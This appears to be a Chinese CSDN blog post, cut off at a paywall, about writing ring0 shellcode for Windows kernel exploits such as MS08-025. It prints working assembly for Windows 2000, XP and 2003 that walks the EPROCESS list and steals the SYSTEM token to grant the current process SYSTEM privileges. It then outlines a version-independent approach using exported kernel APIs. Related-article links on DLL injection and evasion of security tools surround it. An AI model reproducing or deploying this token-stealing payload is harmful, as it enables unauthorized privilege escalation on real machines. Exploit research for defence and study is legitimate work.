编写通用内核shellcode

最新推荐文章于 2023-08-17 18:37:34 发布
最新推荐文章于 2023-08-17 18:37:34 发布
阅读量1.3k 收藏
点赞数
文章标签: system token null module image api
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2842171
版权
 一、多个内核漏洞的出现将研究者的目光从ring3引向了ring0 最近曝光的ms08-025漏洞,受影响的系统包含了微软出版的几乎所有NT体系结构的版本, 引起了不少研究者的兴趣,漏洞曝光不久就在网上出现了利用程序。基于内核漏洞的溢出, 为我们获取系统的ring0执行权限打开了方便之门,通过这类漏洞提升本地执行权限,获取 system权限执行级别。 目前流传的利用程序,ring0 shellco
摘要由CSDN通过智能技术生成
 一、多个内核漏洞的出现将研究者的目光从ring3引向了ring0

最近曝光的ms08-025漏洞,受影响的系统包含了微软出版的几乎所有NT体系结构的版本,
引起了不少研究者的兴趣,漏洞曝光不久就在网上出现了利用程序。基于内核漏洞的溢出,
为我们获取系统的ring0执行权限打开了方便之门,通过这类漏洞提升本地执行权限,获取
system权限执行级别。

目前流传的利用程序,ring0 shellcode大多通过将system进程的Token赋予当前进程来
获取system权限。比较典型的代码如下:

if ( OsVersionInfo.dwMinorVersion == 0 ) {

__asm {

nop
nop
nop
nop
nop
nop

mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]

mov esi,[eax+0x44]//取当前进程EPROCESS
mov eax,esi

search2000:

mov eax,[eax+0xA0]
sub eax,0xA0
mov edx,[eax+0x9C]
cmp edx,0x8 // 通过PID查找系统进程
jne search2000

mov eax,[eax+0x12C] // 获取system进程的token
mov [esi+0x12C],eax // 修改当前进程的token
ret 8

}
}

if ( OsVersionInfo.dwMinorVersion == 1 ) {

__asm {

nop
nop
nop
nop
nop
nop

mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]

mov esi,[eax+0x220]
mov eax,esi

searchXp:

mov eax,[eax+0x88]
sub eax,0x88
mov edx,[eax+0x84]
cmp edx,0x4 // 通过PID查找系统进程
jne searchXp

mov eax,[eax+0xc8] // 获取system进程的token
mov [esi+0xc8],eax // 修改当前进程的token

ret 8

}
}

if ( OsVersionInfo.dwMinorVersion == 2 ) {

__asm {

nop
nop
nop
nop
nop
nop

mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]

mov esi,[eax+0x218]
mov eax,esi

search2003:

mov eax,[eax+0x98]
sub eax,0x98
mov edx,[eax+0x94]
cmp edx,0x4 // 通过PID查找系统进程
jne search2003

mov eax,[eax+0xd8] // 获取system进程的token
mov [esi+0xd8],eax // 修改当前进程的token
ret 8

}
}

对于视窗操作系统,由于EPROCESS这个结构不固定,不同系统中system进程PID不同,导
致上述代码遍历EPROCESS链表查找system进程时需要先判断系统版本,实际是采用硬编码的
方式ring0 shellcode。这种做法的兼容性并不是太好,在同一系统不同补丁下,难免保证不
出现蓝屏。笔者利用上述代码,在非sp1的2k3系统上蓝屏,深刻体会到了ring0利用程序崩溃
时候的威力。

二、本地通用的提权代码

为了提高兼容性,就要尽量避免使用硬编码的方式。由ring3 shellcode的编程经验可
知。使用API可以可靠的执行需要的操作。而API的名称则相对固定。

提权操作将system进程的Token赋予当前执行进程,我们需要做以下的操作:

1.找到system进程EPROCESS。ring0 可以直接访问EPROCESS结构,而ntoskrnl.exe导出
的PsInitialSystemProcess 是一个指向system进程的EPROCESS的指针。我们只要从
ntoskrnl.exe获取导出变量PsInitialSystemProcess即可获得system进程的EPROCESS。

2.获得当前进程的EPROCESS。ntoskrnl.exe提供了IoThreadToProcess(xp,2k3的
PsGetThreadProcess为同一函数)可以查找线程所属的进程,而当前执行线程可由KPCR+124h
获得,通过当前执行线程调用IoThreadToProcess就可以获得当前进程的EPROCESS。鉴于对
于不同版本的NT系统,KPCR这个结构是一个相当稳定的结构,我们甚至可以从内存[0FFDFF124h]
获取当前线程的ETHREAD指针。

3.替换当前进程的Token为system的Token。由于Token在EPROCESS中的偏移不固定,需
要先找出这个偏移值,然后再替换。ntoskrnl.exe导出PsReferencePrimaryToken函数包含
了从EPROCESS取Token的操作,我们
最低0.47元/天 解锁文章
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用NtCreateThreadEx将Dll注入目标进程
KOOKNUT的博客
05-12 2321
第一遍学习这个注入方法时候,只知道NtCreateThreadEx是未公开的nt函数,当时要定义一个函数指针出来,好像在看雪上找到的这个函数的声明,,太久远了,记不清了。 在Windows2000的源码和Reactos中都无法找到NtCreateThreadEx的函数声明和实现,所以试了下用IDA看看ntdll的导出表,哇,好开心找到了,但是,,好像什么都没有,只有一个系统调用号,没有任何参数的信息。 我最后在https://securityxploded.com/ntcreatethreadex.php
kinject:内核Shellcode注入器
03-25
亲缘关系内核Shellcode注入器基本的vs2019 + cpp + wdk用法(仅64位) kdu -map sys.sys kinject -f shellcode_full_path -p pid
驱动开发:内核远程线程实现DLL注入
CSDN
06-22 6299
在笔者上一篇文章`《驱动开发:内核RIP劫持实现DLL注入》`介绍了通过劫持RIP指针控制程序执行流实现插入DLL的目的,本章将继续探索全新的注入方式,通过`NtCreateThreadEx`这个内核函数实现注入DLL的目的,需要注意的是该函数在微软系统中未被导出使用时需要首先得到该函数的入口地址,`NtCreateThreadEx`函数最终会调用`ZwCreateThread`,本章在寻找函数的方式上有所不同,前一章通过内存定位的方法得到所需地址,本章则是通过解析导出表实现。
Inject集合----远程线程注入(NtCreateThreadEx)
qq_42021840的博客
05-15 2153
介绍: 前面写过一片远程线程注入的文章,用到的是CreateRemoteThread函数来远程注入线程的,这次我们用NtCreateThreadEx来创建远程线程,其实并没有技术的升级,而是进行了创建远程线程函数的升级,下面是CreateRemoteThread在Reactos中的源码 /* Create the Kernel Thread Object */ Status = NtCreateThread(&hThread, ...
[转载]关于NtCreateUserProcess和NtCreateThreadEx的参数
angbagangzhe065140的博客
02-10 767
转自: http://hi.baidu.com/zzzevazzz/item/b2a9c9a4ea6805f615329ba7 这两个Vista新增的系统服务函数原型未公开,目前网上搜索到的资料有些问题,特别是对于最后一个参数的描述不确切。 首先说NtCreateUserProcess。网上找到的函数原型如下: DWORD newNtCreateUserProcess(PVOID ...
一文读懂远程线程注入
2201_75571291的博客
08-17 323
在红队行动中,红队的目的都是要在不暴露自身行动的前提下,向蓝队发动攻击。他们使用各种技术和程序来隐藏C2连接和数据流。攻击活动的第一步是获得初始访问权。他们会使用定制的恶意软件和有效载荷来躲避防杀软和EDR等防御工具。本文涉及知识点实操练习:[DLL注入型病毒实验](https://www.hetianlab.com/expc.do?wemedia)(通过实验了解DLL注入型病毒的攻击过程)进程注入是用来逃避防御机制的重要技术之一。
Android系统shellcode编写.zip_android_shellcode
09-23
在Android环境下,由于其基于Linux内核shellcode的原理与传统的Linux shellcode相似,但存在一些特定的差异,如Dalvik虚拟机的存在和对ARM或x86架构的支持。 Android shellcode编写的核心挑战在于以下几个方面: ...
NimShellCodeLoader:使用nim编写shellcode加载器
02-03
Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:...
shellcode加载器
10-02
ShellCode_Loader.py”可能是用Python编写的一个脚本,负责加载和执行加密的shellcode。Python因其丰富的库和易读性而常被用作快速原型开发或创建复杂工具。这个脚本可能包含了加载、解密shellcode并注入到进程中...
Custom Shellcode
最新发布
05-16
Custom Shellcode 代码参考.
NtCreateThreadEx在Win7 x64位调用失败解决办法
qq_34471028的博客
03-25 933
问题 在研究进程注入的时候,发现在Win10 64位上调用NtCreateThreadEx可以执行成功,但是换到Win7 64位上会失败,并且返回GetLastError = 8,程序是以管理员运行且内部已实现提升进程访问权限。 解决方案 函数NtCreateThreadEx在32位和64位的定义有所不同,区分不同的系统位数选择函数声明节课解决在Win7 64位上调用失败的问题。 64位N...
网络靶场实战-安全开发之直接系统调用
蛇矛实验室
12-13 540
熟悉 Windows 编程的人应该知道,Native API 一般是不直接对外公开的,它通常作为操作系统内部的一个组件,并且只能由操作系统内部的组件或应用程序调用,所以在使用一些未文档的化的 Native API 时,需要通过网上公开的资料或者通过逆向取获取其函数原型和相关参数。在安全研发的过程中,难免会遇到在用户模式对抗 AV/EDR 的挂钩,应对的方法有很多,比如可以使用直接系统调用,还可以将杀软的所挂的钩子解除,还有一种就是寻找具有相同功能未被挂钩的 API
邪恶的RING0注射SHELLCODE
08-22 1222
ZwCreateProcessEx 是个非常非常好的东西,虽然他是个UNDOC.但是如果你仔细阅读过WIN2K的SRC,并且非常了解PE的运行机制,你会发现一些很有趣的东西。这对目前的所有NT内核的系统来说都是致命的可以用来做什么1. 制造漏洞2. 提升权限3. 拿来写病毒4. 拿来写各种木马5. 各种ROOTKI但是这里我只想很简单的说一下原理。我只希望这样的东西只用来讨论而已,
转一个win32k回调实现自定义r3函数的方法 教主威武
Sunny_wwc的专栏
03-27 2623
<br />ring0调用ring3早已不是什么新鲜事,除了APC,我们知道还有KeUserModeCallback.其原型如下:<br />NTSTATUS<br />KeUserModeCallback (<br />     IN ULONG ApiNumber,<br />     IN PVOID InputBuffer,<br />     IN ULONG InputLength,<br />     OUT PVOID *OutputBuffer,<br />     IN PULONG O
无驱动执行Ring0代码
wowbell的专栏
02-23 1033
<br />// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code<br /> //************************************************************************<br /> #include<br /> #include<br /> #include<br /><br /> #pragma comment (lib,"ntdll.lib") // Copy From
任意用户模式下执行 ring 0 代码
Rprop
05-03 2665
<br />        众所周知在非 Admin 用户模式下,是不允许加载驱动执行 RING 0 代码的。<br /> 本文提供了一种方法,通过修改系统 GDT,IDT 来添加自己的 CALLGATE 和<br /> INTGATE 这样便在系统中设置了一个后门。我们就可以利用这个后门<br /> 在任意用户模式下执行 ring 0 代码了。为了保证我们添加的 CALLGATE 和 INT<br /> GATE 永久性。可以在第一次安装时利用 SERVICE API 或 INF 文件设置成随<br />
CreateRemoteThread RtlCreateUserThread NtCreateThreadEx
dre4merp
05-16 811
函数原型 HANDLE CreateRemoteThread( HANDLE hProcess, // handle to process LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD SIZE_T dwStackSize, // initial stack size LPTHREAD_START_ROUTINE lpStartAddress...
LdrLoadDll+NtCreateThreadEx结合实现DLL的注入
技术引领巅峰=〉牛人无所不在
11-30 2919
项目要求实现对文件操作的监控,首先想到的就是通过HOOK的方式,先是通过setWindowsHookEx采用全局注入方式注入文件操作DLL,这种方式在WIN10操作系统有效,但是在WIN7上无效,后来又使用了CreateRemoteThread采用远程注入方式,结果还是只在WIN10上有限,又查了很多资料,最后看到网上又说可以使用LdrLoadDll+NtCreateThreadEx于是又采用这种...
ARM汇编基础与Shellcode编写实战
"这篇文档是关于在ARM平台上编写汇编语言SHELLCODE的教程,适合初学者入门。它涵盖了ARM汇编基础、常用指令、模式切换、地址计算、分支指令,以及如何编写ARM Shellcode,包括系统调用、参数映射、逆向工程等实践...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值